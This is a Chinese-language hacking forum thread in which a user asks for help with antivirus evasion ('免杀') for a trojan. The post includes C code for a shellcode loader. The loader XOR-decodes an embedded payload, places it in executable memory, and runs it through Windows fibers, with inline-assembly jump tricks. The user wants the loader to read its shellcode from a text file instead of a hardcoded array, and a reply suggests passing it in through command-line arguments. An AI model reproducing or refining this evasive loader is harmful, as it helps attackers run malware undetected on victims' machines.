【免杀求助】求助大佬如何把木马里面的二进制文件写成可输出的，不要写死

whitexee · 发表于 2023-4-3 11:41:37

马上注册，结交更多好友，享用更多功能^_^

您需要登录才可以下载或查看，没有账号？立即注册

x

#include <windows.h>

void like()
{
    unsigned char data[] =
     {
    我的shellcode
    };
    LPVOID fiber = ConvertThreadToFiber(NULL);
    LPVOID Alloc= VirtualAlloc(NULL,sizeof(data),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    for (int i = 0;i < sizeof(data);i++)
    {
        data[i] ^=99;
    }
    CopyMemory(Alloc,data,sizeof(data));
     LPVOID shellFiber= CreateFiber(0,(LPFIBER_START_ROUTINE)Alloc,NULL);
    SwitchToFiber(shellFiber);
}
int main()
{
    __asm
    {
        mov eax, offset data;
        _emit 0xFF;
        _emit 0xE0;
    }
    ((void(WINAPI*)(void)) & data)();
    like();   
}

whitexee · 发表于 2023-4-7 09:48:03

我想在<我的shellcode>那里不用自己输入，可以直接读取.txt文件输入

xiaomanyi520 · 发表于 2024-4-23 21:50:08

可以利用main()函数第二个参数。

账号		自动登录	找回密码
密码			立即注册